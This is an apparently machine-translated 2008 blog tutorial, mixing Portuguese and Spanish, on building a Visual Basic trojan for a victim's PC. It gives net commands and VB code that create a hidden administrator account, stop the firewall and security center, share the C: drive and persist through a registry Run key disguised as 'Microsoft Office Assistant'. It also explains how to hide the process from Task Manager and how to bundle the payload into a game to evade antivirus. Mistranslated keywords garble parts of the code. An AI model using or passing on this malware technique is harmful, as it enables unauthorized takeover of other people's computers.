Decadente, mas eficaz, Você programa, Você compila, antivírus não detecta e todos ficam felizes ;)

Lo primeiro, comandos MSDOS que nos interessam saber para depois colocar no código de Visual Basic para executar no PC da vítima,

COMANDO
EJEMPLO
DESCRIÇÃO
net user nombreusuario contraseña /ADD net user IUSR_wXP piruli /add Crea el usuario IUSR_wXP con la contraseña 'piruli’ para que quando queramos entrar en el PC remoto ya tengamos un usuario y una contraseña
net group nombregrupo nombreusuario /ADD net localgroup Administradores /add IUSR_wXP Al usuario criado anteriormente le mete en el grupo administradores, para que no tengamos problemas de permisos. Somos el administrador del PC, que más queremos!! 🙂
net stop nombredelservicio net stop “Firewall de Windows/Conexión compartida a Internet (ICS)” Sirve para detener servicios que no queremos que nos controle, por exemplo el firewall de Windows XP, el antivirus, el Antispiware…
net share nombrerecurso=Path: net share C=C: Partilha unidades de disco ou o caminho que nos interesse no PC onde se execute

Nada mau, todos estes comandos, se nos ocorrerem mais podemos executá-los no PC da pessoa que nos interesse aceder ao seu PC (isto é uma questão de imaginação), por exemplo, com estes conseguimos criar um utilizador que seja Administrador, paramos o firewall e entramos no seu disco C, tudo pela internet e da forma mais simples, agora só falta que o execute… e como? muito simples, lê abaixo.

Okey, agora eu costumo fazer isto com Visual Basic, não sou um especialista na matéria, de todo, mas faço algum programa ou algum jogo para a pessoa a quem quero aceder e coloco estas linhas. Ou então simplesmente gero o programa VB com estas 4 linhas e com um Joinner (que é um programa que me une vários ficheiros, eu envio-lho) Por exemplo, envio-lhe um PPS típico de disparates e com o joinner faço com que ele seja executado em segundo plano, o mau é que os joinners são detectados pelos antivírus, por isso prefiro fazer eu o jogo com VB, mesmo que seja super estúpido, mas que o execute.

Segundo, como fazer para executar tudo isto cada vez que o computador dele arrancar, muito bem, entrando no registo e criando uma entrada aqui:

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun

Oh, bem, vamos ao que é o código fonte de VB necessário, este seria para executar os comandos de MSDOS que nos interessem, cria-se uma Sub com este conteúdo e definem-se estas duas funções no topo de tudo.

Private Declare Function OpenProcess Lib “kernel32” (ByVal dwDesiredAccess&, ByVal bInheritHandle&, ByVal dwProcessId&) Como Long
Private Declare Function GetExitCodeProcess Lib “kernel32” (ByVal hProcess Como Long, lpExitCode Como Long) Como Long
Sub ParaServiciosYcreaUsuario()

Dim hShell Como Long
Dim hProc Como Long
Dim codExit Como Long
Dim sCmd Como String
Dim Comando Como String
‘ Para o serviço do Centro de segurança
&nbspComando = “net stop ” & Chr(34) & “Centro de segurança” & Chr(34)
&nbspsCmd = “cmd /c ” & Comando
&nbsphShell = Shell(Environ$(“Comspec”) & ” /c ” & sCmd, vbHide)
‘ o Chr(34) são as aspas duplas, para executar um comando de MSDOS que seja uma frase longa precisamos executá-lo com aspas duplas, pois assim ficaria para que o VB o execute bem.
‘ Para o serviço do Firewall do Windows
&nbspComando = “net stop ” & Chr(34) & “Firewall de Windows/Conexión compartida a Internet (ICS)” & Chr(34)
&nbspsCmd = “cmd /c ” & Comando
&nbsphShell = Shell(Environ$(“Comspec”) & ” /c ” & sCmd, vbHide)
‘ Cria o utilizador IUSR_wXP2
&nbspComando = “net user IUSR_wXP2 Hh3rr3r01 /add”
&nbspsCmd = “cmd /c ” & Comando
&nbsphShell = Shell(Environ$(“Comspec”) & ” /c ” & sCmd, vbHide)

‘ Adiciona o utilizador ao grupo de Administradores local
&nbspComando = “net localgroup Administradores /add IUSR_wXP2”
&nbspsCmd = “cmd /c ” & Comando
&nbsphShell = Shell(Environ$(“Comspec”) & ” /c ” & sCmd, vbHide)

‘ Partilha C: o seu disco rígido como C para que possamos aceder pela rede, embora também pudéssemos aceder como C$
&nbspComando = “net share C=C:”
&nbspsCmd = “cmd /c ” & Comando
&nbsphShell = Shell(Environ$(“Comspec”) & ” /c ” & sCmd, vbHide)
End Sub

Okey, ahora si lo que nos interesa es meterlo en el registro para que se inicie siempre que arranque el PC de la víctima y que cada vez que reinicie su PC le pare el servicio del firewall, le comparta C…

Sub MeteloEnRegistro()
Dim hregkey Como Long
Dim subkey Como String
&nbspsubkey = “SoftwareMicrosoftWindowsCurrentVersionRun”
Dim stringbuffer Como String
Dim PathPrograma Como String
&nbspPathPrograma = “C:WINDOWSsystem32svchost32.exe”
Dim NombrePrograma Como String
&nbspNombrePrograma = “Microsoft Office Assistant”
retval = RegOpenKeyEx(HKEY_CURRENT_USER, subkey, 0, KEY_WRITE, hregkey) Se retval <> 0 Then
Debug.Print “Can’t open the subkey”
Exit Sub
End If&nbspstringbuffer = PathPrograma & vbNullChar
&nbspretval = RegSetValueEx(hregkey, NombrePrograma, 0, REG_SZ, ByVal stringbuffer, Len(stringbuffer))
&nbspRegCloseKey hregkey
End Sub

Y necesitamos en un módulo meter esto:

Public Declare Function RegOpenKeyEx Lib “advapi32.dll” Alias “RegOpenKeyExA” (ByVal hKey Como Long, ByVal lpSubKey Como String, ByVal ulOptions Como Long, ByVal samDesired Como Long, phkResult Como Long) Como Long
Public Declare Function RegCloseKey Lib “advapi32.dll” (ByVal hKey Como Long) Como Long
Public Declare Function RegSetValueEx Lib “advapi32.dll” Alias “RegSetValueExA” (ByVal hKey Como Long, ByVal lpValueName Como String, ByVal Reserved Como Long, ByVal dwType Como Long, lpData As Any, ByVal cbData Como Long) Como Long
Public Const HKEY_CURRENT_USER = &H80000001
Public Const KEY_WRITE = &H20006
Public Const REG_SZ = 1

Podes descargarte o código fonte completo de AQUI. Si tenéis alguma sugestão es pedirlo o dirlo!

Personalmente me gusta poner isto ao princípio, quando se carrega a aplicação, es para que el utilizador não o veja nem em ecrã nem em el “Administrador de tareas” que suele ser perfeito para que no nos mate el proceso.

Me.Visible = False
App.TaskVisible = False


Postagens recomendadas

Autor

nheobug@bujarra.com
Autor del blog Bujarra.com Cualquier necesidad que tengas, Não hesite em contactar-me, Vou tentar ajudá-lo sempre que puder, Compartilhar é viver ;) . Desfrute de documentos!!!

Keylogger casero (propio)

28 Outubro 2008